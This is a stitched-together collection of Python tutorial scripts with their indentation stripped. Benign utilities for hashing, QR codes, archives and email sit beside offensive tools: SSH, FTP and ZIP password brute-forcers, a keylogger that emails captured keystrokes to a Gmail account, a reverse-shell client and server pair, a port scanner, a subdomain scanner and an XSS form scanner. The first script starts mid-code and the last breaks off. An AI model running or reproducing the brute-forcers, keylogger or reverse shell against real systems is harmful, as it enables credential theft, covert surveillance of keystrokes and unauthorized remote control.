file = json.load(open(filename, encoding="utf8"))
content = file['verse']
for verse_id, ayah in content.items():
text += f"{ayah}."
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
print(text, file=quran_file)
import paramiko
import socket
import time
from colorama import init, Fore
# initialize colorama
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE
def is_ssh_open(hostname, username, password):
# initialize SSH client
client = paramiko.SSHClient()
# add to know hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password, timeout=3)
except socket.timeout:
# this is when host is unreachable
print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
return False
except paramiko.AuthenticationException:
print(f"[!] Invalid credentials for {username}:{password}")
return False
except paramiko.SSHException:
print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
# sleep for a minute
time.sleep(60)
return is_ssh_open(hostname, username, password)
else:
# connection was established successfully
print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
return True
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
parser.add_argument("-u", "--user", help="Host username.")
# parse passed arguments
args = parser.parse_args()
host = args.host
passlist = args.passlist
user = args.user
# read the file
passlist = open(passlist).read().splitlines()
# brute-force
for password in passlist:
if is_ssh_open(host, user, password):
# if combo is valid, save it to a file
open("credentials.txt", "w").write(f"{user}{host}:{password}")
break
from cryptography.fernet import Fernet
import os
def write_key():
"""
Generates a key and save it into a file
"""
key = Fernet.generate_key()
with open("key.key", "wb") as key_file:
key_file.write(key)
def load_key():
"""
Loads the key from the current directory named key.key
"""
return open("key.key", "rb").read()
def encrypt(filename, key):
"""
Given a filename (str) and key (bytes), it encrypts the file and write it
"""
f = Fernet(key)
with open(filename, "rb") as file:
# read all file data
file_data = file.read()
# encrypt data
encrypted_data = f.encrypt(file_data)
# write the encrypted file
with open(filename, "wb") as file:
file.write(encrypted_data)
def decrypt(filename, key):
"""
Given a filename (str) and key (bytes), it decrypts the file and write it
"""
f = Fernet(key)
with open(filename, "rb") as file:
# read the encrypted data
encrypted_data = file.read()
# decrypt data
decrypted_data = f.decrypt(encrypted_data)
# write the original file
with open(filename, "wb") as file:
file.write(decrypted_data)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Encryptor Script")
parser.add_argument("file", help="File to encrypt/decrypt")
parser.add_argument("-g", "--generate-key", dest="generate_key", action="store_true",
help="Whether to generate a new key or use existing")
parser.add_argument("-e", "--encrypt", action="store_true",
help="Whether to encrypt the file, only -e or -d can be specified.")
parser.add_argument("-d", "--decrypt", action="store_true",
help="Whether to decrypt the file, only -e or -d can be specified.")
args = parser.parse_args()
file = args.file
generate_key = args.generate_key
if generate_key:
write_key()
# load the key
key = load_key()
encrypt_ = args.encrypt
decrypt_ = args.decrypt
if encrypt_ and decrypt_:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
elif encrypt_:
encrypt(file, key)
elif decrypt_:
decrypt(file, key)
else:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
import ftplib
from threading import Thread
import queue
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
# init()
# initialize the queue
q = queue.Queue()
# port of FTP, aka 21
port = 21
def connect_ftp():
global q
while True:
# get the password from the queue
password = q.get()
# initialize the FTP server object
server = ftplib.FTP()
print("[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
pass
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials: ")
print(f"\tHost: {host}")
print(f"\tUser: {user}")
print(f"\tPassword: {password}{Fore.RESET}")
# we found the password, let's clear the queue
with q.mutex:
q.queue.clear()
q.all_tasks_done.notify_all()
q.unfinished_tasks = 0
finally:
# notify the queue that the task is completed for this password
q.task_done()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="FTP Cracker made with Python")
parser.add_argument("host", help="The target host or IP address of the FTP server")
parser.add_argument("-u", "--user", help="The username of target FTP server")
parser.add_argument("-p", "--passlist", help="The path of the pass list")
parser.add_argument("-t", "--threads", help="Number of workers to spawn for logining, default is 30", default=30)
args = parser.parse_args()
# hostname or IP address of the FTP server
host = args.host
# username of the FTP server, root as default for linux
user = args.user
passlist = args.passlist
# number of threads to spawn
n_threads = args.threads
# read the wordlist of passwords
passwords = open(passlist).read().split("\n")
print("[+] Passwords to try:", len(passwords))
# put all passwords to the queue
for password in passwords:
q.put(password)
# create n_threads that runs that function
for t in range(n_threads):
thread = Thread(target=connect_ftp)
# will end when the main thread end
thread.daemon = True
thread.start()
# wait for the queue to be empty
q.join()
import ftplib
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
init()
# hostname or IP address of the FTP server
host = "192.168.1.113"
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21
def is_correct(password):
# initialize the FTP server object
server = ftplib.FTP()
print(f"[!] Trying", password)
try:
# tries to connect to FTP server with a timeout of 5
server.connect(host, port, timeout=5)
# login using the credentials (user & password)
server.login(user, password)
except ftplib.error_perm:
# login failed, wrong credentials
return False
else:
# correct credentials
print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
return True
# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")
print("[+] Passwords to try:", len(passwords))
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
if is_correct(password):
break
import hashlib
import sys
def read_file(file):
"""Reads en entire file and returns file bytes."""
BUFFER_SIZE = 16384 # 16 kilo bytes
b = b""
with open(file, "rb") as f:
while True:
# read 16K bytes from the file
bytes_read = f.read(BUFFER_SIZE)
if bytes_read:
# if there is bytes, append them
b += bytes_read
else:
# if not, nothing to do here, break out of the loop
break
return b
if __name__ == "__main__":
# read some file
file_content = read_file(sys.argv[1])
# some chksums:
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(file_content).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(file_content).hexdigest())
print("SHA-512:", hashlib.sha512(file_content).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(file_content).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(file_content).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(file_content).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(file_content).hexdigest())
import hashlib
# encode it to bytes using UTF-8 encoding
message = "Some text to hash".encode()
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(message).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(message).hexdigest())
print("SHA-512:", hashlib.sha512(message).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(message).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(message).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(message).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(message).hexdigest())
from PIL import Image
from PIL.ExifTags import TAGS
import sys
# path to the image or video
imagename = sys.argv[1]
# read the image data using PIL
image = Image.open(imagename)
# extract EXIF data
exifdata = image.getexif()
# iterating over all EXIF data fields
for tag_id in exifdata:
# get the tag name, instead of human unreadable tag id
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
print(f"{tag:25}: {data}")
import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Semaphore is for blocking the current thread
# Timer is to make a method runs after an interval amount of time
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 600 # 10 minutes
EMAIL_ADDRESS = "put_real_address_heregmail.com"
EMAIL_PASSWORD = "put_real_pw"
class Keylogger:
def __init__(self, interval):
# we gonna pass SEND_REPORT_EVERY to interval
self.interval = interval
# this is the string variable that contains the log of all
# the keystrokes within self.interval
self.log = ""
# for blocking after setting the on_release listener
self.semaphore = Semaphore(0)
def callback(self, event):
"""
This callback is invoked whenever a keyboard event occurs
(i.e when a key is released in this example)
"""
name = event.name
if len(name) > 1:
# not a character, special key (e.g ctrl, alt, etc.)
# uppercase with []
if name == "space":
# " " instead of "space"
name = " "
elif name == "enter":
# add a new line whenever an ENTER is pressed
name = "[ENTER]\n"
elif name == "decimal":
name = "."
else:
# replace spaces with underscores
name = name.replace(" ", "_")
name = f"[{name.upper()}]"
self.log += name
def sendmail(self, email, password, message):
# manages a connection to an SMTP server
server = smtplib.SMTP(host="smtp.gmail.com", port=587)
# connect to the SMTP server as TLS mode ( for security )
server.starttls()
# login to the email account
server.login(email, password)
# send the actual message
server.sendmail(email, email, message)
# terminates the session
server.quit()
def report(self):
"""
This function gets called every self.interval
It basically sends keylogs and resets self.log variable
"""
if self.log:
# if there is something in log, report it
self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
# can print to a file, whatever you want
# print(self.log)
self.log = ""
Timer(interval=self.interval, function=self.report).start()
def start(self):
# start the keylogger
keyboard.on_release(callback=self.callback)
# start reporting the keylogs
self.report()
# block the current thread,
# since on_release() doesn't block the current thread
# if we don't block it, when we execute the program, nothing will happen
# that is because on_release() will start the listener in a separate thread
self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
import argparse
import socket # for connecting
from colorama import init, Fore
from threading import Thread, Lock
from queue import Queue
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
# number of threads, feel free to tune this parameter as you wish
N_THREADS = 200
# thread queue
q = Queue()
print_lock = Lock()
def port_scan(port):
"""
Scan a port on the global variable host
"""
try:
s = socket.socket()
s.connect((host, port))
except:
with print_lock:
print(f"{GRAY}{host:15}:{port:5} is closed {RESET}", end='\r')
else:
with print_lock:
print(f"{GREEN}{host:15}:{port:5} is open {RESET}")
finally:
s.close()
def scan_thread():
global q
while True:
# get the port number from the queue
worker = q.get()
# scan that port number
port_scan(worker)
# tells the queue that the scanning for that port
# is done
q.task_done()
def main(host, ports):
global q
for t in range(N_THREADS):
# for each thread, start it
t = Thread(target=scan_thread)
# when we set daemon to true, that thread will end when the main thread ends
t.daemon = True
# start the daemon thread
t.start()
for worker in ports:
# for each port, put that port into the queue
# to start scanning
q.put(worker)
# wait the threads ( port scanners ) to finish
q.join()
if __name__ == "__main__":
# parse some parameters passed
parser = argparse.ArgumentParser(description="Simple port scanner")
parser.add_argument("host", help="Host to scan.")
parser.add_argument("--ports", "-p", dest="port_range", default="1-65535", help="Port range to scan, default is 1-65535 (all ports)")
args = parser.parse_args()
host, port_range = args.host, args.port_range
start_port, end_port = port_range.split("-")
start_port, end_port = int(start_port), int(end_port)
ports = [ p for p in range(start_port, end_port + 1) ]
main(host, ports)
import socket # for connecting
from colorama import init, Fore
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
def is_port_open(host, port):
"""
determine whether host has the port open
"""
# creates a new socket
s = socket.socket()
try:
# set a timeout so that closed/filtered ports fail faster (a little less accuracy)
s.settimeout(0.2)
# tries to connect to host using that port
s.connect((host, port))
except:
# cannot connect, port is closed
# return false
return False
else:
# the connection was established, port is open!
return True
# get the host from the user
host = input("Enter the host:")
# iterate over ports, from 1 to 1024
for port in range(1, 1025):
if is_port_open(host, port):
print(f"{GREEN}[+] {host}:{port} is open {RESET}")
else:
print(f"{GRAY}[!] {host}:{port} is closed {RESET}", end="\r")
import socket
import subprocess
import sys
SERVER_HOST = sys.argv[1]
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))
# receive the greeting message
message = s.recv(BUFFER_SIZE).decode()
print("Server:", message)
while True:
# receive the command from the server
command = s.recv(BUFFER_SIZE).decode()
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# execute the command and retrieve the results
output = subprocess.getoutput(command)
# send the results back to the server
s.send(output.encode())
# close client connection
s.close()
import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 5003
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()
# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))
# make the PORT reusable
# when you run the server multiple times in Linux, Address already in use error will raise
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")
# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Connected!")
# just sending a message, for demonstration purposes
message = "Hello and Welcome".encode()
client_socket.send(message)
while True:
# get the command from prompt
command = input("Enter the command you wanna execute:")
# send the command to the client
client_socket.send(command.encode())
if command.lower() == "exit":
# if the command is exit, just break out of the loop
break
# retrieve command results
results = client_socket.recv(BUFFER_SIZE).decode()
# print them
print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()
import cv2
import numpy as np
import os
def to_bin(data):
"""Convert data to binary format as string"""
if isinstance(data, str):
return ''.join([ format(ord(i), "08b") for i in data ])
elif isinstance(data, bytes) or isinstance(data, np.ndarray):
return [ format(i, "08b") for i in data ]
elif isinstance(data, int) or isinstance(data, np.uint8):
return format(data, "08b")
else:
raise TypeError("Type not supported.")
def encode(image_name, secret_data):
# read the image
image = cv2.imread(image_name)
# maximum bytes to encode
n_bytes = image.shape[0] * image.shape[1] * 3 // 8
print("[*] Maximum bytes to encode:", n_bytes)
if len(secret_data) > n_bytes:
raise ValueError("[!] Insufficient bytes, need bigger image or less data.")
print("[*] Encoding data...")
# add stopping criteria
secret_data += "====="
data_index = 0
# convert data to binary
binary_secret_data = to_bin(secret_data)
# size of data to hide
data_len = len(binary_secret_data)
for row in image:
for pixel in row:
# convert RGB values to binary format
r, g, b = to_bin(pixel)
# modify the least significant bit only if there is still data to store
if data_index < data_len:
# least significant red pixel bit
pixel[0] = int(r[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant green pixel bit
pixel[1] = int(g[:-1] + binary_secret_data[data_index], 2)
data_index += 1
if data_index < data_len:
# least significant blue pixel bit
pixel[2] = int(b[:-1] + binary_secret_data[data_index], 2)
data_index += 1
# if data is encoded, just break out of the loop
if data_index >= data_len:
break
return image
def decode(image_name):
print("[+] Decoding...")
# read the image
image = cv2.imread(image_name)
binary_data = ""
for row in image:
for pixel in row:
r, g, b = to_bin(pixel)
binary_data += r[-1]
binary_data += g[-1]
binary_data += b[-1]
# split by 8-bits
all_bytes = [ binary_data[i: i+8] for i in range(0, len(binary_data), 8) ]
# convert from bits to characters
decoded_data = ""
for byte in all_bytes:
decoded_data += chr(int(byte, 2))
if decoded_data[-5:] == "=====":
break
return decoded_data[:-5]
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Steganography encoder/decoder; this Python script encodes data within images.")
parser.add_argument("-t", "--text", help="The text data to encode into the image, this only should be specified for encoding")
parser.add_argument("-e", "--encode", help="Encode the following image")
parser.add_argument("-d", "--decode", help="Decode the following image")
args = parser.parse_args()
secret_data = args.text
if args.encode:
# if the encode argument is specified
input_image = args.encode
print("input_image:", input_image)
# split the absolute path and the file
path, file = os.path.split(input_image)
# split the filename and the image extension
filename, ext = file.rsplit(".", 1)
output_image = os.path.join(path, f"{filename}_encoded.{ext}")
# encode the data into the image
encoded_image = encode(image_name=input_image, secret_data=secret_data)
# save the output image (encoded image)
cv2.imwrite(output_image, encoded_image)
print("[+] Saved encoded image.")
if args.decode:
input_image = args.decode
# decode the secret data from the image
decoded_data = decode(input_image)
print("[+] Decoded data:", decoded_data)
import requests
from threading import Thread
from queue import Queue
q = Queue()
def scan_subdomains(domain):
global q
while True:
# get the subdomain from the queue
subdomain = q.get()
# scan the subdomain
url = f"http://{subdomain}.{domain}"
try:
requests.get(url)
except requests.ConnectionError:
pass
else:
print("[+] Discovered subdomain:", url)
# we're done with scanning that subdomain
q.task_done()
def main(domain, n_threads, subdomains):
global q
# fill the queue with all the subdomains
for subdomain in subdomains:
q.put(subdomain)
for t in range(n_threads):
# start all threads
worker = Thread(target=scan_subdomains, args=(domain,))
# daemon thread means a thread that will end when the main thread ends
worker.daemon = True
worker.start()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Faster Subdomain Scanner using Threads")
parser.add_argument("domain", help="Domain to scan for subdomains without protocol (e.g without 'http://' or 'https://')")
parser.add_argument("-l", "--wordlist", help="File that contains all subdomains to scan, line by line. Default is subdomains.txt",
default="subdomains.txt")
parser.add_argument("-t", "--num-threads", help="Number of threads to use to scan the domain. Default is 10", default=10, type=int)
args = parser.parse_args()
domain = args.domain
wordlist = args.wordlist
num_threads = args.num_threads
main(domain=domain, n_threads=num_threads, subdomains=open(wordlist).read().splitlines())
q.join()
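# A hypothetical run of the threaded scanner above (the script and wordlist names are assumptions);
# "domain" is positional and -l/-t fall back to subdomains.txt and 10 threads as defined above:
#   python fast_subdomain_scanner.py example.com -l subdomains.txt -t 10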
import requests
# the domain to scan for subdomains
domain = "google.com"
# read all subdomains
file = open("subdomains.txt")
# read all content
content = file.read()
# split by new lines
subdomains = content.splitlines()
for subdomain in subdomains:
# construct the url
url = f"http://{subdomain}.{domain}"
try:
# if this raises an ERROR, that means the subdomain does not exist
requests.get(url)
except requests.ConnectionError:
# if the subdomain does not exist, just pass, print nothing
pass
else:
print("[+] Discovered subdomain:", url)
import requests
from pprint import pprint
from bs4 import BeautifulSoup as bs
from urllib.parse import urljoin
def get_all_forms(url):
"""Given a url, it returns all forms from the HTML content"""
soup = bs(requests.get(url).content, "html.parser")
return soup.find_all("form")
def get_form_details(form):
"""
This function extracts all possible useful information about an HTML form
"""
details = {}
# get the form action (target url)
action = form.attrs.get("action", "").lower()
# get the form method (POST, GET, etc.)
method = form.attrs.get("method", "get").lower()
# get all the input details such as type and name
inputs = []
for input_tag in form.find_all("input"):
input_type = input_tag.attrs.get("type", "text")
input_name = input_tag.attrs.get("name")
inputs.append({"type": input_type, "name": input_name})
# put everything to the resulting dictionary
details["action"] = action
details["method"] = method
details["inputs"] = inputs
return details
def submit_form(form_details, url, value):
"""
Submits a form given in form_details
Params:
form_details (dict): a dictionary that contains form information
url (str): the original URL that contains that form
value (str): this will be replaced to all text and search inputs
Returns the HTTP Response after form submission
"""
# construct the full URL (if the url provided in action is relative)
target_url = urljoin(url, form_details["action"])
# get the inputs
inputs = form_details["inputs"]
data = {}
for input in inputs:
# replace all text and search values with value
if input["type"] == "text" or input["type"] == "search":
input["value"] = value
input_name = input.get("name")
input_value = input.get("value")
if input_name and input_value:
# if input name and value are not None,
# then add them to the data of form submission
data[input_name] = input_value
if form_details["method"] == "post":
return requests.post(target_url, data=data)
else:
# GET request
return requests.get(target_url, params=data)
def scan_xss(url):
"""
Given a url, it prints all XSS vulnerable forms and
returns True if any is vulnerable, False otherwise
"""
# get all the forms from the URL
forms = get_all_forms(url)
print(f"[+] Detected {len(forms)} forms on {url}.")
js_script = "<Script>alert('hi')</scripT>"
# returning value
is_vulnerable = False
# iterate over all forms
for form in forms:
form_details = get_form_details(form)
content = submit_form(form_details, url, js_script).content.decode()
if js_script in content:
print(f"[+] XSS Detected on {url}")
print(f"[*] Form details:")
pprint(form_details)
is_vulnerable = True
# won't break because we want to print other available vulnerable forms
return is_vulnerable
if __name__ == "__main__":
import sys
url = sys.argv[1]
print(scan_xss(url))
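# A hypothetical invocation of the XSS scanner above (the script name and URL are assumptions);
# the target URL is the only command-line argument (sys.argv[1]):
#   python xss_scanner.py "http://example.com/page-with-a-form"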
from tqdm import tqdm
import zipfile
import sys
# the password list path you want to use
wordlist = sys.argv[2]
# the zip file you want to crack its password
zip_file = sys.argv[1]
# initialize the Zip File object
zip_file = zipfile.ZipFile(zip_file)
# count the number of words in this wordlist
n_words = len(list(open(wordlist, "rb")))
# print the total number of passwords
print("Total passwords to test:", n_words)
with open(wordlist, "rb") as wordlist:
for word in tqdm(wordlist, total=n_words, unit="word"):
try:
zip_file.extractall(pwd=word.strip())
except:
continue
else:
print("[+] Password found:", word.decode().strip())
exit(0)
print("[!] Password not found, try other wordlist.")
import requests
from pprint import pprint
# email and password
auth = ("emailexample.com", "ffffffff")
# get the HTTP Response
res = requests.get("https://secure.veesp.com/api/details", auth=auth)
# get the account details
account_details = res.json()
pprint(account_details)
# get the bought services
services = requests.get('https://secure.veesp.com/api/service', auth=auth).json()
pprint(services)
# get the upgrade options
upgrade_options = requests.get('https://secure.veesp.com/api/service/32723/upgrade', auth=auth).json()
pprint(upgrade_options)
# list all bought VMs
all_vms = requests.get("https://secure.veesp.com/api/service/32723/vms", auth=auth).json()
pprint(all_vms)
# stop a VM automatically
stopped = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/stop", auth=auth).json()
print(stopped)
# {'status': True}
# start it again
started = requests.post("https://secure.veesp.com/api/service/32723/vms/18867/start", auth=auth).json()
print(started)
# {'status': True}
import os
import matplotlib.pyplot as plt
def get_size_format(b, factor=1024, suffix="B"):
"""
Scale bytes to its proper byte format
e.g:
1253656 => '1.20MB'
1253656678 => '1.17GB'
"""
for unit in ["", "K", "M", "G", "T", "P", "E", "Z"]:
if b < factor:
return f"{b:.2f}{unit}{suffix}"
b /= factor
return f"{b:.2f}Y{suffix}"
def get_directory_size(directory):
"""Returns the directory size in bytes."""
total = 0
try:
# print("[+] Getting the size of", directory)
for entry in os.scandir(directory):
if entry.is_file():
# if it's a file, use stat() function
total += entry.stat().st_size
elif entry.is_dir():
# if it's a directory, recursively call this function
total += get_directory_size(entry.path)
except NotADirectoryError:
# if the path isn't a directory, return the file size instead
return os.path.getsize(directory)
except PermissionError:
# if for whatever reason we can't open the folder, return 0
return 0
return total
def plot_pie(sizes, names):
"""Plots a pie where sizes is the wedge sizes and names """
plt.pie(sizes, labels=names, autopct=lambda pct: f"{pct:.2f}%")
plt.title("Different Sub-directory sizes in bytes")
plt.show()
if __name__ == "__main__":
import sys
folder_path = sys.argv[1]
directory_sizes = []
names = []
# iterate over all the directories inside this path
for directory in os.listdir(folder_path):
directory = os.path.join(folder_path, directory)
# get the size of this directory (folder)
directory_size = get_directory_size(directory)
if directory_size == 0:
continue
directory_sizes.append(directory_size)
names.append(os.path.basename(directory) + ": " + get_size_format(directory_size))
print("[+] Total directory size:", get_size_format(sum(directory_sizes)))
plot_pie(directory_sizes, names)
import tarfile
from tqdm import tqdm # pip3 install tqdm
def decompress(tar_file, path, members=None):
"""
Extracts tar_file and puts the members to path.
If members is None, all members on tar_file will be extracted.
"""
tar = tarfile.open(tar_file, mode="r:gz")
if members is None:
members = tar.getmembers()
# with progress bar
# set the progress bar
progress = tqdm(members)
for member in progress:
tar.extract(member, path=path)
# set the progress description of the progress bar
progress.set_description(f"Extracting {member.name}")
# or use this
# tar.extractall(members=members, path=path)
# close the file
tar.close()
def compress(tar_file, members):
"""
Adds files (members) to a tar_file and compresses it
"""
# open file for gzip compressed writing
tar = tarfile.open(tar_file, mode="w:gz")
# with progress bar
# set the progress bar
progress = tqdm(members)
for member in progress:
# add file/folder/link to the tar file (compress)
tar.add(member)
# set the progress description of the progress bar
progress.set_description(f"Compressing {member}")
# close the file
tar.close()
# compress("compressed.tar.gz", ["test.txt", "test_folder"])
# decompress("compressed.tar.gz", "extracted")
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="TAR file compression/decompression using GZIP.")
parser.add_argument("method", help="What to do, either 'compress' or 'decompress'")
parser.add_argument("-t", "--tarfile", help="TAR file to compress/decompress, if it isn't specified for compression, the new TAR file will be named after the first file to compress.")
parser.add_argument("-p", "--path", help="The folder to compress into, this is only for decompression. Default is '.' (the current directory)", default="")
parser.add_argument("-f", "--files", help="File(s),Folder(s),Link(s) to compress/decompress separated by ','.")
args = parser.parse_args()
method = args.method
tar_file = args.tarfile
path = args.path
files = args.files
# split by ',' to convert into a list
files = files.split(",") if isinstance(files, str) else None
if method.lower() == "compress":
if not files:
print("Files to compress not provided, exiting...")
exit(1)
elif not tar_file:
# take the name of the first file
tar_file = f"{files[0]}.tar.gz"
compress(tar_file, files)
elif method.lower() == "decompress":
if not tar_file:
print("TAR file to decompress is not provided, nothing to do, exiting...")
exit(2)
decompress(tar_file, path, files)
else:
print("Method not known, please use 'compress/decompress'.")
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.audio import MIMEAudio
# your credentials
email = "emailexample.com"
password = "password"
# the sender's email
FROM = "emailexample.com"
# the receiver's email
TO = "toexample.com"
# the subject of the email (subject)
subject = "Just a subject"
# initialize the message we wanna send
msg = MIMEMultipart()
# set the sender's email
msg["From"] = FROM
# set the receiver's email
msg["To"] = TO
# set the subject
msg["Subject"] = subject
# set the body of the email
text = MIMEText("This email is sent using <b>Python</b> !", "html")
# attach this body to the email
msg.attach(text)
# initialize the SMTP server
server = smtplib.SMTP("smtp.gmail.com", 587)
# put the connection in TLS (secure) mode and send EHLO
server.starttls()
# login to the account using the credentials
server.login(email, password)
# send the email
server.sendmail(FROM, TO, msg.as_string())
# terminate the SMTP session
server.quit()
import paramiko
import argparse
parser = argparse.ArgumentParser(description="Python script to execute BASH scripts on Linux boxes remotely.")
parser.add_argument("host", help="IP or domain of SSH Server")
parser.add_argument("-u", "--user", required=True, help="The username you want to access to.")
parser.add_argument("-p", "--password", required=True, help="The password of that user")
parser.add_argument("-b", "--bash", required=True, help="The BASH script you wanna execute")
args = parser.parse_args()
hostname = args.host
username = args.user
password = args.password
bash_script = args.bash
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# read the BASH script content from the file
bash_script = open(bash_script).read()
# execute the BASH script
stdin, stdout, stderr = client.exec_command(bash_script)
# read the standard output and print it
print(stdout.read().decode())
# print errors if there are any
err = stderr.read().decode()
if err:
print(err)
# close the connection
client.close()
import paramiko
hostname = "192.168.1.101"
username = "test"
password = "abc123"
commands = [
"pwd",
"id",
"uname -a",
"df -h"
]
# initialize the SSH client
client = paramiko.SSHClient()
# add to known hosts
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
client.connect(hostname=hostname, username=username, password=password)
except:
print("[!] Cannot connect to the SSH Server")
exit()
# execute the commands
for command in commands:
print("="*50, command, "="*50)
stdin, stdout, stderr = client.exec_command(command)
print(stdout.read().decode())
err = stderr.read().decode()
if err:
print(err)
client.close()
from tqdm import tqdm
import requests
import sys
# the url of file you want to download, passed from command line arguments
url = sys.argv[1]
# read 1024 bytes every time
buffer_size = 1024
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the file name
filename = url.split("/")[-1]
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data))
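# Hypothetical usage of the downloader above (the script name and URL are assumptions); the
# file URL is the only command-line argument (sys.argv[1]):
#   python download_file.py https://example.com/big_file.zip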
import qrcode
import sys
data = sys.argv[1]
filename = sys.argv[2]
# generate qr code
img = qrcode.make(data)
# save img to a file
img.save(filename)
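# Hypothetical usage of the QR code generator above (script name, data and output file are
# assumptions); sys.argv[1] is the data to encode and sys.argv[2] is the output image:
#   python generate_qrcode.py "https://example.com" qrcode.png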
import cv2
import sys
filename = sys.argv[1]
# read the QRCODE image
img = cv2.imread(filename)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
# detect and decode
data, bbox, straight_qrcode = detector.detectAndDecode(img)
# if there is a QR code
if bbox is not None:
print(f"QRCode data:\n{data}")
# display the image with lines
# length of bounding box
n_lines = len(bbox)
for i in range(n_lines):
# draw all lines
point1 = tuple(bbox[i][0])
point2 = tuple(bbox[(i+1) % n_lines][0])
cv2.line(img, point1, point2, color=(255, 0, 0), thickness=2)
# display the result
cv2.imshow("img", img)
cv2.waitKey(0)
cv2.destroyAllWindows()
import cv2
# initialize the cam
cap = cv2.VideoCapture(0)
# initialize the cv2 QRCode detector
detector = cv2.QRCodeDetector()
while True:
_, img = cap.read()
# detect and decode
data, bbox, _ = detector.detectAndDecode(img)
# check if there is a QRCode in the image
if bbox is not None:
# display the image with lines
for i in range(len(bbox)):
# draw all lines
cv2.line(img, tuple(bbox[i][0]), tuple(bbox[(i+1) % len(bbox)][0]), color=(255, 0, 0), thickness=2)
if data:
print("[+] QR Code detected, data:", data)
# display the result
cv2.imshow("img", img)
if cv2.waitKey(1) == ord("q"):
break
cap.release()
cv2.destroyAllWindows()
from github import Github
# your github account credentials
username = "username"
password = "password"
# initialize github object
g = Github(username, password)
# searching for my repository
repo = g.search_repositories("pythoncode tutorials")[0]
# create a file and commit n push
repo.create_file("test.txt", "commit message", "content of the file")
# delete that created file
